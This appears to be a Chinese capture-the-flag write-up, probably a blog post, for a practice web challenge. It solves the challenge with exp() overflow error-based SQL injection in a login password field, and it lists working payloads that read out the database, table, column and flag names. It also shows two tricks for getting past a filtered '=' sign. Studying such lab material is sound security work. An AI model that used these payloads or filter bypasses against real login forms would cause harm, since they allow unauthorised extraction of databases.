加了料的报错注入 - exp报错解法

加了料的报错注入 - exp报错解法

原题链接

http://ctf5.shiyanbar.com/web/baocuo/index.php

分析

exp测试一下(因为#之类的注释符被过滤,注意闭合):

username=&password='or exp() or '

查数据库:

username=&password=' or  exp(~(select * from(select database())x)) or'  

查表

username=&password=' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema regexp database())a)) or '  #利用这则表达式代替过滤的'='

username=&password=' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where !(table_schema <> database()))a)) or '  #利用非非逆否命题绕过 '='

DOUBLE value is out of range in 'exp(~((select 'ffll44jj,users' from dual)))'

查列名

username=&password=' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where !(table_name <> 'ffll44jj'))a)) or '  # 利用非非逆否命题绕过 '='

username=&password=' or exp(~(select * from(select group_concat(column_name) from  information_schema.columns where table_name regexp 'ffll44jj')a)) or '    #利用正则表达式绕过过滤‘=’

DOUBLE value is out of range in 'exp(~((select 'value' from dual)))'

查数据

username=&password=' or exp(~(select * from(select value from  ffll44jj)z)) or ' 

DOUBLE value is out of range in 'exp(~((select 'flag{err0r_b4sed_sqli_+_hpf}' from dual)))'

flag

flag{err0r_b4sed_sqli_+_hpf}

知识点

exp 溢出报错注入

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值